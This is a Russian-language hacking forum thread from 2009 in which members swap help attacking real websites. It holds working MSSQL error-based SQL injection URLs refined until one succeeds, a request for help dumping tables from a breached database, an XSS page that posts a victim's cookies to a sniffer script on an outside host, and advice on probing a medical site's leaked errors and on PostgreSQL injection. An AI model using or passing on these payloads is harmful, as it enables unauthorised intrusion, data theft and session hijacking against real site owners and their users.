Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Chest3r

    Chest3r New Member

    Joined:
    14 Nov 2009
    Messages:
    40
    Likes Received:
    4
    Reputations:
    4
    Спасибо Большое! +10 тебе! :)

    Есть еще кое что. Во время ковыряния на этом сайте, на одной из страниц как то вывалилась такая ошибочка, хорошо что сохранил:
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    есть sqli на mssql,
     
    #10102 YuNi|[c, 15 Nov 2009
    Last edited: 15 Nov 2009
  3. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    count() возвращает int, поэтому необходимо преобразовать к типу varchar. Однако mssql преобразует строку обратно в число, поэтому я обычно делаю substring():
    Code:
    SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM information_schema.TABLES);
    В запросе выше как раз есть пример конкатенации строк, для этого используется "+", методом GET необходимо использовать %2B.
    Про аналог GROUP_CONCAT в MSSQL: http://raz0r.name/obzory/select-for-xml-sql-injection/
     
    1 person likes this.
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    тогда запрось типа:
    Code:
    http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+count('Email')+from+tbl_Members))--
    будеть

    Code:
    http://localhost/script.asp?id=4'+and+1=convert(int,(SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM tbl_Members)));
    правильно я понял?
     
  5. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Нужно так:
    http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
     
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    не погло ((

    а '^' обязательно ли
     
  7. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'%2BCAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
     
    1 person likes this.
  8. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ООООО молодец спс сработал
    респект
    Где прочитат про Cast?
     
  9. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://msdn.microsoft.com/en-us/library/ms187928.aspx
     
    3 people like this.
  10. [i]

    [i] Banned

    Joined:
    12 Oct 2009
    Messages:
    7
    Likes Received:
    9
    Reputations:
    0
    Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
    Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
    Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
    Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?



    [​IMG]

    всем пионерам спасибо :)
     
  11. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    ручками чекни
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    хочешь - дай ссылку в личку, прочекаю
     
  13. G4bR1eL

    G4bR1eL Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    70
    Likes Received:
    3
    Reputations:
    0
    Нужна небольшая консультация по XSS. XSS (пассивку) нашел , но немогу настроить frame.htm для сайта со сниффером.

    Code:
    <html>
    <body>
    <form name="xss" action="http://***.com.ua//index.jsp" method="post">
    <input type="hidden" name="com" value="***">
    <input type="hidden" name="***" value='1000">
    <script>document.location.href="http://****.phpnet.us/s.php?"+document.cookie;</script>'>
    <script language=javascript>xss.submit()</script>
    </form>
    </body>
    </html>
    Что верно будет прописывать в сием файле и почему? Звездочки поставил для конспирации.
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Кхм, подскажите пожалуйста, как посчитать кол-во таблиц при PostgreSQL inj из information_schema.tables? В гугле что-то нифига нету

    PS: Тот же самый вопрос и про кол-во колонок в табле и про кол-во данных в табле

    Спасибо

    Стандартные count(*) не работают что-то

    в этой мегатеме

    https://forum.antichat.ru/threadnav35599-1-10.html

    живу уже два часа, там есть всё - как то, как это, а как посчитать - нету
     
    #10114 Pashkela, 16 Nov 2009
    Last edited: 16 Nov 2009
  15. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    сегодня чисто случайно искал информацию(по медицине) и нашел такое:
    __http://www.cardiosite.ru/doctors/registration.aspx
    здесь ошибка такая:
    Code:
    Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately. 
    
    Compiler Error Message: JS1241: Type 'ALP.Data.SqlData.QueryS' could not be found, is an assembly reference missing?
    
    Source Error:
    
     
    
    [No relevant source lines]
     
    
    Source File: D:\sites\cardio\_controls\users\user-registration-solvay.ascx    Line: 184 
    можно смело понять, что там IIS (ну и с MSSQL)

    И хотел узнать - это что за ошибка и ошибка чего? IIS или SQL ? И как можно (или вобше можно) это использовать ?

    P.S. Кстати, нажимая Show Detailed Compiler Output: можно получить еще кучу информации. там введены таблицы, да ? (UserIP, tbUserLastName, tbUserFirstName и т.д.)
     
    #10115 B1t.exe, 16 Nov 2009
    Last edited: 16 Nov 2009
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 l1ght:

    Если нетрудно, приведи пример хоть одной PostgreSQl инъекции, где вообще возможно посчитать кол-во таблиц в information_schema.tables и увидеть результат в сорцах страницы

    отправил в личку
     
    #10116 Pashkela, 16 Nov 2009
    Last edited: 16 Nov 2009
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Pashkela

    count(*) отлично работает везде, уверен, что ты забываешь о приведении типов, из-за этого и проблемы

    PS. Я бы дал линк, но ты-же начнёшь там свою чудопрогу тестить, и будет на нормальном сайте жопа в логах :)
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 jokester:

    POST|GET|PROXY и жопа и в логах? :) Лучше не отмазывайся а дай ответ на вопрос. Ссылку (свою) скинул в личку
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Отписал ответ в ПМ, по поводу проги тоже :)

    По поводу отмазываться, спасибо, оценил
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 jokester:

    спасибо, помогло :cool:
     
Thread Status:
Not open for further replies.